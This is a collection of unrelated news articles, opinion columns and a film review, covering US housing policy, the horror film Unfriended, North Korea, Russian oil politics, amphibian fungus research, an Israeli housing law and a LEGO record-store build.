“ The fear is that , if the federal government cuts their funds , they might have to take a voucher away from someone , ” said Shamus Roller , executive director of the National Housing Law Project . “ There are a lot of people on that waiting list who are n't going to get vouchers . ”
Carson is taking a holistic view and plans to work with other agencies . He 's a strong advocate for education , job training , criminal sentencing reform , and building human capital .
“ Everybody is either going to become part of the engine or part of the load , ” Carson said at an April 3 meeting of the National Low Income Housing Coalition . “ We as a nation can go a lot further and a lot faster if a lot more people are part of the engine . ”
The message echoes one that forced House Speaker Paul Ryan ( R-Wis. ) to retreat years ago .
“ Even Paul Ryan had to move off their ` makers-and-takers ' frame , ” said Chris Estes , president of the National Housing Conference . “ You have a lot of people working full time and they do n't make enough money . That 's nondebatable . It does n't matter how much faith in God you have , that 's not the fix . ”
Brendan Cheney contributed to this report .
Cast/Crew : Directed by Leo Gabriadze , written by Nelson Greaves , starring Shelley Hennig ( Debbie in Ouija ) as protagonist Blaire Lily .
Plot : One year ago tonight a cyber-bullied girl killed herself . A group of friends gets a Skype call from their account . Wow , that synopsis sounds horrific . Stay with me !
Thoughts on the film :
• Unfriended is presented as a feature-length live screen capture from Blaire 's laptop . It 's very odd , you literally watch someone browse around a computer ( play YouTube , iTunes music , answer IMs , Skype call , googling , buffering videos , waiting for downloads ! ) .
• These programs listed will date the movie but for the next few years it 'll be grand , and that 's where 99 % of it 's revenue will come from . So good stuff .
• This surreal and unique presentation made it very cheap to make ( or perhaps because it was cheap it makes ) . The film had a $ 1m budget . I wish there was a bit of cash around for the deaths ; that it just blacks out and buffers means it 's not satisfying , although it 's an acceptable cost-saving measure that meshs with the style fo the film .
• Since its set in the “ real world ” its more difficult to accept how someone can so easily manipulate & coordinate events & changing tech to be scary ( e.g . ca n't disconnect a Skype call , turning on & off lights , messing with gmail etc ) but seeing these people blindly accept downloads and click links from strangers , yes ! It becomes plausable . It takes a while coming around to the idea that someone or some thing can remotely manipulate user UIs .
• It 's not great having to read a ( supposed ) teenage girl 's IMs . Lots of unanswered short , incessant posts , e.g . hounding their boyfriend to answer their IMs with this ? ? ? ? ? ! ! ! ! The length of time they spend reading text suggests she 's in elementary school .
• The ‘ hacker ' is presented as an empty profile pic , although in one scene it turns to a hidden camera in one of their rooms – great .
• ‘ Laura ' has the ability to take control over every aspect of the computers , inckuding playing unpausable ironic music ! Like an “ I hurt too ” Spotify playlist .
• Why not just go offline ? ( i.e . rational idea ) “ No – I do n't know where my phone is ! ” Then the killer demands they stay online , or else .
• So Laura forces them play a game of “ never have I ever ” which makes the gang reveal their indiscretions , and important truths surrounding Laura 's death ( who uploaded it etc ) leading to lots of shouting and crying . Not admitting so ends in death .
• The screaming and shouting gets really unbearable and you 'll wonder why you 're still watching this Skype conversation . Everyone turns out to be amoral assholes of course !
• The film has a constant scary video distortion , why ? Because Laura also has showmanship !
• Cool bit , the kayfabe video that caused Laura to kill themselves is on youtube ( the youtube link in the movie ACTUALLY WORKS ! )
• Hilariously , instead of calling the police , Blaire opens Chat Roulette . DIED . A milestone in cinema .
• Sadly , it 's not a scary movie . You only catch quick glimpses of deaths so it 's not impactful . I get that the ‘ unknown is scarier ' but this film does n't give enough to elicit that kind of response .
• Through it 's storyline , the film highlights cyber-bullying , and how difficult it is to ‘ just unplug ' as these teens are incapable of it . The agenda is n't pushed hard , but rather it 's the framework of the movie , and if they logged off there would n't be a film !
• Unfriended brought in $ 58m so a sequel is coming next year .
Overall : It 's squarely aimed at teenagers , and watching someone browse their computer can get tiresome , but it 's a solid , unique gimmick . Not recommended , but good job making a low-budget movie stand out .
Pyongyang and Kim Jong-un may be acting up because they believe they know the lessons of giving up weapons of mass destruction
KCNA / HANDOUT / REUTERS North Korean leader Kim Jong-un presides over a plenary meeting of the Central Committee of the Workers ' Party of Korea in Pyongyang on March 31 , 2013
If you want to know what 's going through the mind of the North Korean regime , go back to the murder of Muammar Gaddafi . The way the North Koreans look at it , Gaddafi gave up their nuclear bomb and lost their head . The lesson of Saddam Hussein 's end is another cautionary tale for the North Koreans . If Saddam had held on to their weapons of mass destruction — and lots of them — the U.S. would have had second thoughts about invading their country . Or so I 'm told by a former CIA colleague , and one of the best-informed North Korean watchers around .
North Korea 's Supreme Leader Kim Jong-un , like their father and their grandfather , exists in a rococo fantasy . They truly believe that North Korea possesses an invincible military , that their generals are brilliant , that they could take Seoul in a matter of days . They also believe that as a superpower , North Korea deserves a nuclear arsenal . There ca n't be any other avenue to the international respect North Korea deserves .
( MORE : North Korea 's Nuclear Cul-De-Sac )
It 's in this context , as delusional as it may be , that it 's close to certain that Kim has no intention of backing down in the current confrontation with the U.S . While it 's unlikely their intention is to start a war with the U.S. , they also do n't intend to give up an inch to cool things down . And superpowers do n't submit at the sound of a little saber rattling .
Classic diplomacy has n't worked either . The State Department recently explored the possibility of bypassing the North Korean regime hard-liners , especially those inside the Kim family , and instead make some sort of deal with the rational elements in the leadership . But it proved impossible to break through the impenetrable armor of this little hermit kingdom .
China has been another fruitless avenue . Although the Chinese provide 90 % of North Korea 's fuel and nearly half of its food , there 's only so much pressure the Chinese can bring to bear on the North Koreans . Again , it goes back to North Koreans ' sense of self-interest , i.e . their survival . They believe that when push comes to shove , the Chinese ( and the Russians ) ca n't do anything to keep the leaders of Pyongyang from losing their heads . Just as America 's sweet words whispered in Gaddafi 's ear got them nothing , Chinese promises are worthless .
( PHOTOS : North Korea Ratchets Up Tension on the Peninsula )
To date North Korea 's threats and actions have been mostly bluster . The missiles it moved to its east coast on Thursday can not hit American bases in Guam . It was a signal to the U.S. that Pyongyang wo n't be intimidated . All the B-2 bombers and F-22 fighters flying along North Korea 's borders will be met with escalation .
It 's a mystery to me why Washington ever thought that dancing with the feathers of fallen dictators like Gaddafi and Saddam would leverage our influence with dictators like Kim . Anyhow , the point now is that we 'd better start looking at a way to walk this thing back rather than tightening the tourniquet .
Nothing is for certain when it comes to North Korea , but the chances are good it will shoot something up to restore its dignity — perhaps a South Korean fishing boat or another South Korean navy vessel . Let 's hope that this is the worst , or that some accident does n't occur . In the meantime we 'd better start thinking about how we can quietly but demonstrably figure out how to help North Korea get its “ respect ” back .
( MORE : North Korea 's Saber Rattling : Is the Bark Worse Than the Bite ? )
I recognize that this would be tantamount to political hara-kiri considering the crisis , but we may want to start thinking about letting North Korea into the nuclear club . Just some sort of nominal membership : a couple bombs and regular invitations to club functions . They 're about to have a functioning bomb anyhow , so why not make the most of it ? The downside to this of course is that Iran would want to be in the club , and then Saudi Arabia , and — I do n't — Venezuela . It 's something that would have to be worked out with the North Koreans .
I know this is n't a pretty position to be in . But it 's better than a full-on war with a delusional and paranoid young man with a chip on their shoulder .
PHOTOS : Scenes From North Korea 's Kaesong Industrial Zone
Baer , a former Middle East CIA field officer , is TIME.com 's intelligence columnist and the author of See No Evil and The Devil We Know : Dealing with the New Iranian Superpower .
President Donald Trump 's son , Eric Trump , on Friday accused Twitter of censoring one of their tweets .
In a tweet on Friday , the president 's son tweeted out a screenshot of a tweet posted earlier on Friday that read “ Jobs Jobs Jobs ! ! ! ” followed by several American flag emojis . The tweet also retweeted another user 's tweet that included a Drudge Report link about Friday 's jobs report .
Eric Trump 's tweet was hidden for some viewers behind a standard Twitter warning , which was depicted in the screenshot . The grey warning box reads : “ This tweet is not available because it includes potentially sensitive content . ”
“ Why are my tweets about jobs and the economy being censored ? # Interesting ” Trump tweeted in response .
. @ Twitter - Why are my tweets about jobs and the economy being censored ? # Interesting pic.twitter.com/QSdcj7MjVR — Eric Trump ( @ EricTrump ) August 4 , 2017
Twitter declined to comment on the record about the matter .
ADVERTISEMENT
However , the company has recently introduced features intended to reduce abuse on the site , which include labeling certain accounts as `` sensitive '' that may include content some users could find offensive .
Those `` sensitive '' accounts include content sympathetic to both right- and left-wing ideologies . Some users labeled `` sensitive '' have already complained about their designation .
@ DRUDGE_REPORT , the Twitter account that Trump retweeted , is not verified . It tweets out the majority of aggregated content added to the site Drudge Report and is marked as a sensitive account .
In contrast , Eric Trump 's Twitter account and the Twitter account used by Drudge Report founder Matt Drudge , @ Drudge , are verified accounts .
Julia Manchester contributed to this report .
Originally published February 10 , 2009 at 12:00 AM | Page modified February 10 , 2009 at 2:24 AM
Print
The University of Washington says it will need to cut 600 jobs under the budget proposed by Gov . Chris Gregoire — a number that could rise to 800 if lawmakers make deeper cuts .
The University of Washington says it will need to cut 600 jobs under the budget proposed by Gov . Chris Gregoire — a number that could rise to 800 if lawmakers make deeper cuts .
Responding to a request for information from two state senators , UW President Mark Emmert wrote in a letter that such cuts would have a `` significant impact on the university 's ability to provide high-quality educational opportunities for our state 's citizens and on our long-standing capacity to create jobs and fuel economic growth . ''
Sens . Derek Kilmer , D-Gig Harbor , and Rodney Tom , D-Medina , asked the UW to consider two scenarios — Gregoire 's proposed 13 percent cut in state funding and a larger , 20 percent cut . With the economy continuing to deteriorate , lawmakers are bracing for deeper cuts than those proposed by Gregoire .
State lawmakers are facing a budget deficit that could top $ 6 billion over the next two years .
In an interview , Emmert said that under the first scenario , about 400 administrative and 200 teaching jobs would be cut . Beyond that , they said , most additional cuts would come from the ranks of instructional staff because the administration would be so thin .
The smaller cut would result in several hundred fewer students being admitted to the UW annually , Emmert said . The larger cut would require a phased-in 15 percent reduction in undergraduates .
The UW employs close to 30,000 full-time staff , making it one of the largest employers in the state . Many work for the UW Medical Center or Harborview Medical Center , which are funded largely through insurance reimbursements and other payments and wo n't be directly affected by the state cutbacks .
About 5,700 professors , administrators and others rely directly on state appropriations for their paychecks .
The UW may not wait for the final state budget to begin layoffs , Emmert said . Because of the university 's shrinking endowment — down from more than $ 2 billion to $ 1.6 billion — the UW Foundation could cut about 50 jobs over the coming weeks and months .
`` People make up the majority of the budget . What we do is very labor intensive , '' Emmert said . `` There 's not a lot of money to be saved in other areas . We 've already been reducing budgets in any way that makes sense . ''
Emmert said they do n't yet have specifics on what programs or instructors might be cut . The university 's deans are working with department heads to try and minimize disruptions inside the classroom , they said .
The UW says the proposed cuts would impact everything from research to libraries . Students could expect longer waits when applying for admission or registering for courses .
Nick Perry : 206-515-5639 or nperry @ seattletimes.com
Image caption Biffa disposes of rubbish from commercial , industrial and public sector organisations
Suspected human body parts have been found at a recycling plant in Bristol .
The force was called to the Biffa depot in Avonmouth at approximately 11:00 BST after being alerted by staff .
An Avon and Somerset Police spokesperson said part of the site had been cordoned off while inquiries are under way .
`` Employees at the site were concerned at what they thought were remains in one of their units , '' the police spokesperson said .
Image caption Forensics officers were at the scene for much of Friday
`` At this stage we can not confirm whether or not the remains are human . ''
Biffa is one of the country 's waste management companies , disposing rubbish from commercial , industrial and public sector organisations .
The Russian threat runs out of fuel When oil prices rise , Russia expresses its latent resentments more aggressively , writes Daniel Gros .
For Europe , the defining event of 2014 was Russia 's annexation of Crimea and military intervention in eastern Ukraine 's Donbas region . The Kremlin 's actions directly challenged key principles that have guided Europe for more than six decades , particularly the renunciation of the use of force to alter national borders . But Russia is in no position to sustain its aggressive foreign policy .
It has often been argued that Russia was reacting to the perceived encroachment on its ‘ near abroad ' by the European Union and NATO . But history suggests a simpler explanation : a decade of steadily rising oil prices had emboldened Russia , leaving it ready to seize any opportunity to deploy its military power .
Indeed , the Soviet Union had a similar experience 40 years ago , when a protracted period of rising oil revenues fuelled an increasingly assertive foreign policy , which culminated in the 1979 invasion of Afghanistan . Oil prices quadrupled following the first oil embargo in 1973 , and the discovery of large reserves in the 1970s underpinned a massive increase in Soviet output . As a result , from 1965 to 1980 , the value of Soviet oil production soared by a factor of almost 20 .
Burgeoning oil wealth bolstered the regime 's credibility – not least by enabling a significant increase in military spending – and rising economic and military strength gave the Soviet Union 's geriatric leadership a rejuvenated sense of invulnerability . The invasion of Afghanistan was not merely an improvised response to a local development ( a putsch in Kabul ) ; it was also a direct result of this trend .
Putin 's reaction to the Euromaidan demonstrations in Ukraine followed a similar pattern . In both cases , a seemingly low-cost opportunity was viewed as yielding a large strategic gain – at least in the short run . Indeed , while the devastating consequences of the Soviet Union 's Afghan adventure are now well known , at the time the invasion was viewed as a major defeat for the West .
The Soviet army 's retreat in 1988 is usually ascribed to the Afghan insurgency , led by Pakistan-trained mujahedeen with support from the United States . But the decline in oil prices during the 1980s , which cut the value of Soviet output to one-third of its peak level , undoubtedly played a role . Indeed , it led to a period of extreme economic weakness – a key factor in the Soviet Union 's dissolution just three years after its withdrawal from Afghanistan .
During the 1990s , Russia was too preoccupied with its own post-Soviet political turmoil to object to EU or NATO enlargement to the east . Nor did it have the wherewithal , as its own production and oil prices continued to decline , hitting a trough of $ 10 per barrel in 1999-2000 .
Russia 's stance changed gradually during the early 2000s , as world oil prices – and Russian output – recovered , reinvigorating the country 's economic base at a time when its leadership was becoming increasingly autocratic . Only then did Russia start to claim that the US and its European allies had offered some implicit pledge not to expand NATO eastward .
With oil prices steadily rising , the value of Russian oil production reached a new peak , roughly ten times the 1999 level , in 2008 ; Russia invaded Georgia the same year . Though prices collapsed during the Great Recession of 2009 , they quickly recovered , with the value of Russian output reaching another peak in 2012-13 – precisely when Russia 's position on the EU-Ukraine association agreement hardened . Given that the EU and Ukraine had already been negotiating the deal for more than two years , without much reaction from Russia , the EU was blindsided by the Kremlin 's sudden sharp objections .
Clearly , Russia 's attitude toward its near-abroad is not quite as erratic as it may seem . When oil prices rise , Russia expresses its latent resentments more aggressively , often employing its military . Moreover , at higher prices , the oil industry crowds out other export sectors that support open markets and a less aggressive foreign policy .
The Soviet war in Afghanistan was followed by a long-term decline in oil prices . The recent price slide – to $ 50- $ 60 per barrel , halving the value of Russia 's oil production – suggests that history is about to repeat itself .
And oil prices are not Russia 's only problem . Western sanctions , which seemed to constitute only a pinprick a few months ago , appear to have inflicted serious damage , with the rouble having lost nearly half its value against the US dollar last year . Though financial markets will calm down when the rouble 's exchange rate settles into its new equilibrium , Russia 's economy will remain weak , forcing the country 's leaders to make tough choices .
Against this background , a stalemate in the Donbas seems more likely than an outright offensive aimed at occupying the remainder of the region and establishing a land corridor to Crimea – the outcome that many in the West initially feared . President Vladimir Putin 's new Novorossiya project simply can not progress with oil prices at their current level .
To be sure , Russia will continue to challenge Europe . But no amount of posturing can offset the disintegration of the economy 's material base caused by the new equilibrium in the oil market . In this sense , the US has come to Europe 's rescue in a different way : its production of shale oil and gas might is likely to play a greater role in keeping Russia at bay than NATO troops on Europe 's eastern borders .
Daniel Gros is director of the Centre for European Policy Studies . © Project Syndicate , 2015 .
Scientists have made a key discovery that may help to stem the loss of countless species of amphibians to a deadly fungus .
Frogs and other amphibians have been among the worst hit of all species in recent years in terms of the numbers facing drastic declines or extinction : more than one-third of the more than 6,000 amphibian species are now listed as “ threatened ” in conservation terms , or already extinct .
A devastating chytrid fungus , Batrachochytrium dendrobatidis , has been blamed as possibly the biggest single problem , infecting frogs , salamanders and other amphibians , often fatally .
But now a team in the US has found that it is possible for a certain type of toad to acquire immunity to the fungus – a discovery that could hold out the possibility of saving some of the threatened amphibian populations around the globe .
In particular , the discovery gives hope that it may be possible to keep live specimens and treat them with immunisation , then release them back into the wild and help them to spread back to their native habitats . At present , one of the few methods of combating the effects of the fungus has been to extract specimens from the wild and keep them safe in captivity , away from the sources of infection , as a way of preserving their genes for the future .
If it were possible – and the study suggests it might be – to confer widespread immunity on entire communities of frogs , then saving them could be as simple as lacing local water sources with dead versions of the fungus , that could be absorbed by amphibian populations and immunise them against the disease , which is known to block immune responses . This hope arises because the study found that amphibians can acquire resistance to the fungus after repeated exposures , can be immunised by contact with dead fungi , and can even learn to avoid exposing themselves to infectious fungi . The study was based on observations of oak toads .
Jason Rohr of the University of South Florida , lead author of the study , published as a letter in to peer-review journal Nature on Thursday was cautious about the prospect of immunising wild populations , which will be the next subject of research . “ We are planning on testing whether simply dumping dead Bd into waterbodies will induce acquired immunity and reduce chytrid growth on frogs . If it does , then it might be worth isolating the antigen on chytrid and synthesising it . Theoretically , this antigen could then be released at locations where amphibian species are at risk . ”
But there are many questions still to be answered before scientists can judge whether releasing such antigens into the environment will provide a lifeline for frogs and fellow amphibians .
Rohr listed several of the issues that their further research will seek to resolve , including how long any immunity lasts ; whether tadpoles can aquire immunity ; what concentration of release of the antigen could confer immunity ; and whether such a release could harm any other organisms . Their team will develop a mathematical model to evaluate the feasibility of starting a vaccine programme aimed at getting rid of chytrid , or at least keeping the infection rate low and thus preventing population declines among existing amphibian species .
Asked whether a vaccine could one day halt the death rate in amphibians globally , before they are in catastrophic decline , Rohr said : “ It is hard to forecast how long it will take to assess whether a vaccination approach will work and to hone its effectiveness . I hope the answer is yes ! ”
Entire species of frog are believed to have become extinct before they have even been identified , according to conservationists . Other factors have also contributed to amphibians ' decline – pollution , a loss of habitat , the encroachment of urbanisation , a changing climate .
Amphibians are regarded by many scientists as acting as “ canaries in the coalmine ” in the context of species extinctions , because their make-up and bodies render them more vulnerable to harms such as pollutants and small changes in climate , and losses to these species could herald further serious problems to come for bigger animals , while their niche in the food chain is also key .
One of the sure markers of the paranoid mind is the urge to keep lists . In particular , lists of enemies , subversives , no-goodniks ; the pestilential nuisances , as Sir W.S . Gilbert famously put it , who never would be missed . It virtually goes without saying that the keepers of such lists are always the bullies who survive by fomenting hatred and making sure that their constituents stay in a state of constant agitation . And so it was no surprise to learn over the weekend , via Josh Marshall , that the National Rifle Association has a little list of 497 people and organizations who are in some way , shape , or form anti-gun . It makes for hilarious reading , although it 's sort of frightening to think about the demented minds of the people who assembled it .
The list consists of 141 organizations , 228 celebrities , 27 “ national figures ” who are somehow different from celebrities , 37 journalists , 41 corporations and/or corporate CEOs , and 23 media outlets , all of whom are out to pry that Bushmaster from your warm , live hands . Some of the organizations make perfect sense . The American Civil Liberties Union . Sure . The American Trauma Society . I have no idea what precisely they do , but okay , it stands to reason that if trauma is their racket , they 're probably not big on people amassing large numbers of automatic weapons . Women Strike for Peace . You do n't say !
It strikes the reader of the full list that the net is being cast rather widely . Physicians for Social Responsibility , for example , has plenty to do besides think about guns . Same with AARP . But to me it 's the large number of religious organizations , from the Unitarians to the Methodists to the Church of Christ on over to the U.S. Catholic conference , that begins to suggest the odor of paranoia that will wash over us as we proceed to the rest of the list .
The celebrities section is a hoot . I get George Clooney ; he 's a famous and influential man who dabbles frequently in the political arena and makes no secret of their liberal views . Ditto Ed Asner and Martin Sheen and Russell Simmons . I 'd allow that an NRA that was n't at least Googling people like that occasionally to see what they 'd said about guns lately would be an NRA that was n't doing its job .
But … Sandy Duncan ? If you 're not 45 , I doubt there is any chance that you have the remotest clue who Sandy Duncan is . Musician John McDaniel , apparently best known for conducting the orchestra on The Rosie O'Donnell Show ? “ Interior designer ” Margaret Kemp ? Vinny Testaverde ? ?
On it goes in this batty vein . Tara Lipinski . Mike Myers . Mike Myers 's wife ! Now , if all of these people are indeed on record as saying they support gun control , then so be it , I suppose . But really . What is the point of tracking Mrs. Myers 's sentiments ? ( By the way , these list compilers are n't even good paranoiacs—the list is sloppy and old ; Myers and Robin Ruzan divorced in 2007 , and the NRA posted this list on its website last September . ) There is no point . To a rational person . To the NRA , though , the point is that vigilance has to be unceasing and eternal . Enemies are everywhere , and who knows , it just might someday be loose talk from Robin Ruzan or Margaret Kemp that brings the walls of Jericho tumbling down on Wayne LaPierre 's delusively coiffed head .
It 's funny , is n't it , how it 's always people on the right who keep these lists . Gilbert 's list keeper was Ko-Ko , the Lord High Executioner . Joe McCarthy had their list . Dick Nixon his . I may be wrong , but on a few moments ' reflection here I ca n't think of a liberal or Democrat known for having a bizarre list of real and imagined foes ( by the way , I refrain from calling the NRA 's list an “ enemies list ” because a ) at least it 's public and b ) there 's no evidence the group is doing anything to any of these people ) . I 'm sure Greenpeace keeps track of the political groups on the other side of the fence , but I doubt the group is monitoring the utterances of Delta Burke . No—the swamps in which these fevers have arisen in our history have been almost entirely right wing .
Conservative readers will have started in that last paragraph muttering about Obama 's “ enemies list. ” This , if you 've never heard about it , is a story or a series of stories right-wingers made up last year because an Obama campaign website listed the names of eight men who were donating large amounts of money to anti-Obama efforts . Apparently they got hassled by some bloggers , and this constituted Chicago-thug-style politics , you see . In truth , as I wrote last year , Republicans tried to hype the story of an Obama 's enemies list for the very specific purpose of trying to build public support for nondisclosure on campaign finance .
The good news is that paranoid psychotics usually do themselves in . McCarthy and Nixon certainly did . I know everyone keeps talking about how powerful the NRA is , and that 's true . But the more they 're in the spotlight , the worse they look . Americans get it . It just needs someone to give the boulder a push . Vinny ?
I do n't usually bring a turd to the picnic . After all , I 'm not immune to the enthusiasm surrounding the rescue of 33 Chilean miners from their entombment for 69 days . In fact , while the politicians and corporate titans take their bows and accept kudos , I 'm struck by the human ingenuity and workers ' solidarity displayed for all the world .
What extraordinary feats we humans are capable of when no expense is spared . Locating trapped men thousands of feet beneath the earth , attending to their psychological , medical and emotional needs and those of their families . International solidarity extended by people who previously knew nothing of Chile , but who were touched by the drama of these 33 men who went to work one morning and found themselves buried alive . Wow !
But… I 'm still not exactly clear why no expense was spared for these working men who should never have been down in that heavily fined , unsafe mine in the first place . I 'm thrilled it was , I 'm just not sure why in a country and a world where workers are routinely left to perish it was different this time .
I suspect that a Chilean president 's flagging reputation amidst a miserable economy and the characteristic of all rulers to save their asses and rally the country to national unity when class divisions are stark may be at play here .
As usual , award-winning filmmaker and journalist John Pilger has already sussed out some of the background politics and economics being ignored in all the media frenzy . So , let 's go ahead and celebrate the potential society is capable of , but let 's also feed our brains with the not-so-pretty reality behind the myth of the rescue of the Chilean 33 .
Once again , it 's workers ' solidarity versus bosses ' greed . But this time our side won ! Read Chile 's Ghosts Are Not Being Rescued , originally posted to Truthout .
My next public talk is on Fighting the Right , Friday , Oct. 15th , Rochester Inst . of Technology , Library 's “ Idea Factory , ” 7PM . I 'll also be speaking the following day , Saturday , Oct. 16 , on Can the Working Class Unite ? at 3PM , details are here .
Advertisements
A U.S. civilian was arrested Tuesday , Nov. 29 , 2016 , after a Japanese woman was reportedly injured during an altercation at a lodging facility at Misawa Air Base , Japan .
A U.S. civilian is in custody after a Japanese woman was reportedly injured during a `` physical altercation '' at Misawa Air Base , Japan .
The unidentified civilian , an employee at the Army 's nearby Shariki Communication Site , is accused of assaulting the woman , who works at the Misawa Inn , and another Japanese base employee at the lodge at 1:47 a.m. Tuesday .
The victim was treated for minor injuries at the base 's urgent-care center before being taken to a Japanese hospital , Air Force officials said . The other person involved was not injured .
`` This is a regrettable incident and our thoughts are with our two dedicated employees , '' said Col. R. Scott Jobe , 35th Fighter Wing commander . `` They are valued members of our Misawa family . The safety of our personnel is always a top priority . ''
Local Japanese police said they plan to question the civilian , who remained in custody at the air base on voluntary basis on Wednesday .
The U.S. military retains jurisdiction in the case , said Tohoku Defense Bureau spokesperson Hideo Chida , who urged Air Force officials to maintain discipline of their personnel and to take measures to prevent future incidents .
Stars and Stripes reporter Hana Kusumoto contributed to this report .
hlavac.tyler @ stripes.com
Yesterday , Israel 's Supreme Court dismissed a petition by Adalah : The Legal Center for Arab Minority Rights in Israel effectually facilitating the Judaization of more Palestinian owned land inside Israel . According to Adalah , the court 's decision holding up Israel 's Admissions Committees Law , “ entrenches racial segregation ; 434 small communities in Israel , or 43 % of all residential areas , will be allowed to close their doors to Palestinian Arab citizens of the state. ” Much of the land in question was originally confiscated from Palestinian refugees , and the court 's decision will result in the continued concentration and containment of the Palestinian population in Israel .
In March 2011 , the Knesset passed two racist laws , the “ Nakba Law ” and the “ Admissions Committees Law ” , the latter granting legal legitimacy to “ admission committees ” in small towns , many agricultural , with fewer than 400 families in the Naqab and the Galilee to “ have the full discretion to accept or reject individuals who wish to live in these towns. ” The committees consisting of town residents include a member of the Jewish Agency , the World Zionist Organization , or other “ quasi ” government representative are able , in practice , to “ filter out Arab Palestinian applicants and others from marginalized groups , “ .
On March 30 , 2011 Adalah filed a petition to the Supreme court of Israel demanding the cancellation of the racist law arguing :
The petitioners argued that the law allows admission committees to reject any person on the basis of their or their national belonging , sexual preference , and even on health grounds . It would also allow an admission committee to reject an Arab applicant because their or their culture different from that of the majority of persons living in a community town . The Admission Committees Law violates Israeli domestic law and international law , which prohibit discrimination against any person who does not belong to the dominant group in society , by legitimizing the exclusion of entire groups on the basis that they or they are not suited to the “ social/cultural fabric ” of a community town . Specifically , the law is contrary to the Israeli Basic Law : Human Dignity and Freedom and violates basic constitutional rights , as well as the rights to privacy and to freedom to choose one 's place of residence without arbitrary restriction .
Following the court 's decision upholding the law , Suhab Bishara , the attorney for the petitioners and director of the Land and Planning Unit at Adalah issued a statement through the Institute for Middle East Understanding ( IMEU ) saying , “ The Court 's recent decisions confirm that Palestinian citizens of Israel have no constitutional guarantees or protections of their housing rights . The Court has approved the policy of Israeli government institutions to exclude Arabs from Jewish-only communities that are built on state land or to evict them in order to establish new Jewish communities in their place . The state claims that the communities are for the ‘ general public , ' but it is clear in both policy and law that Arab citizens of Israel are not included in that definition . ”
When the law was first passed in 2011 Human Rights Watch Middle East Director Sarah Leah Whitson stated the Admissions Committees Law “ sanctioned discrimination ” , essentially authorizing Jewish-majority communities to reject Palestinian citizens of Israel applicants for residency status , and chastised Israeli politicians “ Israeli parliamentarians should be working hard to end glaring inequality , not pushing through discriminatory laws to control who can live where ” . Whitson echoed that harsh response in a comment on the court 's dismissal of Adalah 's petition : “ Israel 's Supreme Court today missed a chance to overturn a law whose sponsors sought to enable Jewish communities to prevent Palestinian-Israeli citizens from living among them . The majority said it needed to wait for the law to be implemented , but a law aimed at facilitating ethnic discrimination should be treated as unlawful on its face . ”
Here 's yesterday 's press release from Adalah :
( Haifa , Israel ) Today , 17 September 2014 , in a 5 to 4 decision , an expanded panel of the Israeli Supreme Court decided to dismiss a petition brought by Adalah three years ago against the “ Admissions Committees Law ” . The law allows for hundreds of Israeli Jewish communities in the Naqab ( Negev ) in the south and in the Galilee in the north to reject applicants for housing based on the criteria of “ social suitability ” and the “ social and cultural fabric ” of the town . The law allows the possibility of rejecting applicants who are Palestinian Arab citizens of Israel , as well as other marginalized groups , solely on the basis of their race , ethnicity , religion , or other identity . The court 's decision effectively legalizes the principle of segregation in housing between Arab and Jewish citizens , and permits the practice of racism against Arab citizens in about 434 communities , or 43 % of all towns in Israel . The Association for Civil Rights in Israel ( ACRI ) also filed a petition against this law . In response , Adalah stated that the Court 's decision , “ gives the green light for 434 communities to exist based on the principle of segregated housing . This law is one of the most racist pieces of legislation enacted in recent years , the primary objective of which is to marginalize Arab citizens and prevent them from accessing housing on ‘ state land ' in many communities . The court 's decision upholds one of the most dangerous laws in Israel. ” Adalah Attorney Suhad Bishara , who filed the petition , added that : “ The court 's decision seriously undermines its landmark decision in 1999 in the Ka'adan case . That case allowed an Arab family to move to the town of Katzir despite their rejection by the town 's admissions committee . This latest court decision illustrates the continued deterioration of the constitutional rights and legal protection of Palestinian citizens of Israel. ” Attorney Bishara further stated that the new decision , “ allows the principle of separation in residency based on national identity , and as such , 434 communities will be allowed to close their doors to Arab citizens. ” The Admissions Committees Law , enacted by the Knesset in 2011 , gives “ admissions committees ” – bodies that select applicants for housing units and plots of land – almost full discretion to accept or reject individuals from living in these towns . The committees include a representative from the Jewish Agency or the World Zionist Organization , quasi-governmental entities . The Committees , in practice , filter out Arab Palestinian applicants and others from marginalized groups . While one of the provisions of the law states a duty to respect the right to equality and prevent discrimination , the law allows these committees to reject applicants deemed “ unsuitable to the social life of the community…or the social and cultural fabric of the town , ” thereby legitimizing the exclusion of entire groups . The law also authorizes admissions committees to adopt criteria determined by individual community towns themselves based on their “ special characteristics ” , including those community towns that have defined themselves as having a “ Zionist vision. ” In the last hearing on the case before the Supreme Court on 4 December 2012 , Attorney Bishara argued that , “ the law marginalizes certain groups , creating a legal , constitutional , and legitimate basis for discrimination . The law allows for division of state land based on vague cultural and social standards – and not even the state can explain which criteria admissions committees could use to accept or reject candidates . The law will open the door to arbitrary decisions based on prejudices and personal grudges. ” Attorney Bishara added after that hearing that , “ The law is functioning the same way it did previously as a policy , deterring many segments of the population , especially Palestinian Arab citizens of the state , from applying for housing in these towns for fear of rejection . The law has serious implications now and has had for many years , so it is not possible to say that it is not ripe for judicial ruling . ”
This statement by Yousef Munayyer , Executive Director of the Jerusalem Fund and the Palestine Center in Washington , DC , and Palestinian citizen of Israel , perfectly reflects why Israel , a state that gives legal preference to one ethnicity under the law , does not share U.S. values :
“ The upholding of this law means that the Israeli court system , along with the state , supports the practice of segregation within Israel and against Israeli citizens of Palestinian origin . For state-sanctioned and partially controlled committees to be able to deny residence within communities to certain citizens effectively based on their religion , race or ethnic origin is unthinkable in the United States – such a racist law would be shot down by the US Supreme Court because of constitutional guarantees against discrimination . But it has now been approved by the highest court in Israel . The talk of ‘ shared values ' grows more farcical and the mask covering the face of an Apartheid system falls further by the day , making the ugly reality easier for the world to see . ”
For more history on the Israeli legislation and court decisions precipitating today 's court decision see this Mondoweiss post , The historical context of the Israeli land and planning law regime :
Remember record stores ? I do ! Most of them have disappeared today , but they still have a special place in the hearts of many , many music fans . They 're actually becoming more common again as vinyl sales are on the rise !
This could be a small modular building ; a room scene ; or even just a rack of records , a turntable , and a few minifigures . Record stores have a unique atmosphere ; any set would have to capture that effectively , but it 's not hard given how iconic the typical objects are : crates , posters , album covers , large speakers , turntables , and so on .
This build has received nearly 1000 favorites on my Flickr page , and has been shared by news publications like The Brothers Brick , Spin.com , Consequence of Sound , and Dangerous Minds . I loosely based it on Twist & Shout ( a record store in Denver , USA ) , but it 's amazing how many people have told me it looks exactly like their local record store ! There 's just something about a record store that brings back so much nostalgia and memories to so many people .
